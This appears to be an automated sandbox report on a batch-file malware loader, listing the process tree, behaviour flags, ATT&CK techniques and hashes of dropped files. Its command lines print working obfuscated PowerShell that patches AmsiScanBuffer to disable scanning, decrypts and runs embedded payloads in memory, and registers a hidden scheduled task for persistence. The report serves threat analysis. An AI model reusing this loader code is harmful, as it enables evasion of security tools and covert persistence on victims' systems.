@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zRbhlAENNbV=$EjAgIoPUrELWW.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+'.'+[Char](100)+'l'+[Char](108)+'')));$uLtwjEDZuWcDCg=$dMMVYewsLtEYbp.Invoke($Null,@([Object]$zRbhlAENNbV,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+'a'+''+'r'+''+[Char](121)+''+'A'+'')));$cAleSAkqrfDlJuLEW=$dMMVYewsLtEYbp.Invoke($Null,@([Object]$zRbhlAENNbV,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$NduHDiA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uLtwjEDZuWcDCg,$yfBXOHKWkoWGBzfdffq).Invoke(''+[Char](97)+''+[Char](109)+'si'+[Char](46)+'d'+'l'+''+'l'+'');$mESoJenBNwsNcKqUX=$dMMVYewsLtEYbp.Invoke($Null,@([Object]$NduHDiA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$bseyFUDfTk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cAleSAkqrfDlJuLEW,$RaeZbwVqtkFYQrOVVPQdkS).Invoke($mESoJenBNwsNcKqUX,[uint32]8,4,[ref]$bseyFUDfTk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mESoJenBNwsNcKqUX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cAleSAkqrfDlJuLEW,$RaeZbwVqtkFYQrOVVPQdkS).Invoke($mESoJenBNwsNcKqUX,[uint32]8,0x20,[ref]$bseyFUDfTk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'77s'+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kuNhSMRyNweq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rnRqOyrUfjMsVK,[Parameter(Position=1)][Type]$MxrMCocUvs)$kOlCEqUIpTa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+'e'+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'T'+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$kOlCEqUIpTa.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+[Char](103)+','+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$rnRqOyrUfjMsVK).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$kOlCEqUIpTa.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',V'+'i'+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$MxrMCocUvs,$rnRqOyrUfjMsVK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $kOlCEqUIpTa.CreateType();}$CFZlXXVRJGnzh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+'saf'+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+'M'+''+'e'+''+'t'+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$MUfNgBZDzYvcca=$CFZlXXVRJGnzh.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fSyXAHkaJtnTGUpatsk=kuNhSMRyNweq @([String])([IntPtr]);$hyLzrePJNVtLSXyQHXjgsZ=kuNhSMRyNweq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OrRVRcEHIPB=$CFZlXXVRJGnzh.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+'le'+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$lqqZJhvBxRpWzj=$MUfNgBZDzYvcca.Invoke($Null,@([Object]$OrRVRcEHIPB,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$BvjydpXjaJrTfaGmq=$MUfNgBZDzYvcca.Invoke($Null,@([Object]$OrRVRcEHIPB,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+''+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$rRZxFAp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lqqZJhvBxRpWzj,$fSyXAHkaJtnTGUpatsk).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$pjAKKMxHSuxAsdkPt=$MUfNgBZDzYvcca.Invoke($Null,@([Object]$rRZxFAp,[Object]('A'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$RDbsHDdTKS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvjydpXjaJrTfaGmq,$hyLzrePJNVtLSXyQHXjgsZ).Invoke($pjAKKMxHSuxAsdkPt,[uint32]8,4,[ref]$RDbsHDdTKS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pjAKKMxHSuxAsdkPt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvjydpXjaJrTfaGmq,$hyLzrePJNVtLSXyQHXjgsZ).Invoke($pjAKKMxHSuxAsdkPt,[uint32]8,0x20,[ref]$RDbsHDdTKS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:4124

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1188

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1248

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2992

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1508

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1600

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1816

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1936

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2196

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2812

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2952

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3204

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_947_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_947.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_947.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_947.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lijgTPA5dhfZJWkNjERvpxoEFfjChwGKxEXCCWF2p4I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ajz4mWMPOPBp4cBpjj4jZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YoWfT=New-Object System.IO.MemoryStream(,$param_var); $tqhnx=New-Object System.IO.MemoryStream; $cKCBi=New-Object System.IO.Compression.GZipStream($YoWfT, [IO.Compression.CompressionMode]::Decompress); $cKCBi.CopyTo($tqhnx); $cKCBi.Dispose(); $YoWfT.Dispose(); $tqhnx.Dispose(); $tqhnx.ToArray();}function execute_function($param_var,$param2_var){ $IFErL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RqXgX=$IFErL.EntryPoint; $RqXgX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_947.bat';$yuKlA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_947.bat').Split([Environment]::NewLine);foreach ($ZdxUX in $yuKlA) { if ($ZdxUX.StartsWith(':: ')) { $qArQO=$ZdxUX.Substring(3); break; }}$payloads_var=[string[]]$qArQO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4324

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:4080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0IIdjYbLYUgI.bat" "
7⤵
PID:4396

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4684

C:\Windows\SysWOW64\chcp.com
chcp 65001
8⤵
PID:2208

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
8⤵
- Runs ping.exe
PID:1304

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:1212

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4140

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Modifies data under HKEY_USERS
PID:2168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:3676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4328

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:5020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1448

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4360

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:3968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4356

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4752

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
58cb6ddb98c63f0eba156b3b9ec8a363

SHA1
8a47a7274b1c0d6c83b83fa875526370ab35713e

SHA256
3a7a8fe10bb1796ff7ac709e0c2f90979fc19042b09ee1145a8e1d4f7be4b0f3

SHA512
fa5a08cb6f0942eb1c2e89bababb54cd5d927ace8bd5d10efd46d69007148ae1feebc886a5dd92bd35c6e25e6aa5edbf8fd5016209df38f56666f9ba54c5f4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\0IIdjYbLYUgI.bat

Filesize
276B

MD5
76ea403360735b475bd3270f3d2b3de3

SHA1
623a92601494daee0313460ff033c9189862cf11

SHA256
757b6adeebddea121073d14e3c00aced941862bf067db5463a82127e2bc8a4fe

SHA512
6e27d2755e1b5a279ede7e5b656e05d8153d8dca94d74ab8920445f8785e3ec1e9e7aa549a571fbdbaf1cf21921d07e749714b09c0e0e4d5c279ba78ad7904d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qi1wbotm.jo4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1

Filesize
224B

MD5
75d4730fc877aabee10903d6d72b9143

SHA1
2611840819c67d2442e8ec43dd6edb7b91bab59a

SHA256
f1e4943186ca4a5150443cdd5ed7cc4016630032f54f1f4848778c6cc2a83e43

SHA512
de6405f006857fdf5e4fc9db1773c66c28bcb1d0ce40f3704c89b69dd152bd7c046038106b1170458450537761510a8e3875f73e8535b82d4e4ee074e3186449

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_947.bat

Filesize
513KB

MD5
2f2f86a8f6be8fa6b37bd49bcd660a75

SHA1
f7006941a8cbf7a663e9fa379f75ccd5afedd730

SHA256
3798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c

SHA512
5f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_947.vbs

Filesize
115B

MD5
cc3481c358601cde7b8fc157f47889df

SHA1
24c0491d2acd0d16e72b96c893f811f6d9c67e5a

SHA256
b5232c623157ec4e3cbb1d3f8aeb749435f412f55037a22bfe3c35f344c2651d

SHA512
99faba7eb185b3d0b5287b1b1005910092da984865b60ab03eef9798f2f855cdea7259c93d1ca2cfbc1332d2b93ba3e7e34452bb44a8cd15b4e61759adddbdf1

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d61d7f65117823a52913b840feed43c6

SHA1
e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f

SHA256
d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86

SHA512
e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c

Download Submit
memory/568-258-0x00000246AA420000-0x00000246AA44B000-memory.dmp

Filesize
172KB

Download
memory/568-256-0x00000246AA160000-0x00000246AA185000-memory.dmp

Filesize
148KB

Download
memory/568-257-0x00000246AA420000-0x00000246AA44B000-memory.dmp

Filesize
172KB

Download
memory/568-264-0x00000246AA420000-0x00000246AA44B000-memory.dmp

Filesize
172KB

Download
memory/568-265-0x00007FFB12230000-0x00007FFB12240000-memory.dmp

Filesize
64KB

Download
memory/632-275-0x00000202D17B0000-0x00000202D17DB000-memory.dmp

Filesize
172KB

Download
memory/632-276-0x00007FFB12230000-0x00007FFB12240000-memory.dmp

Filesize
64KB

Download
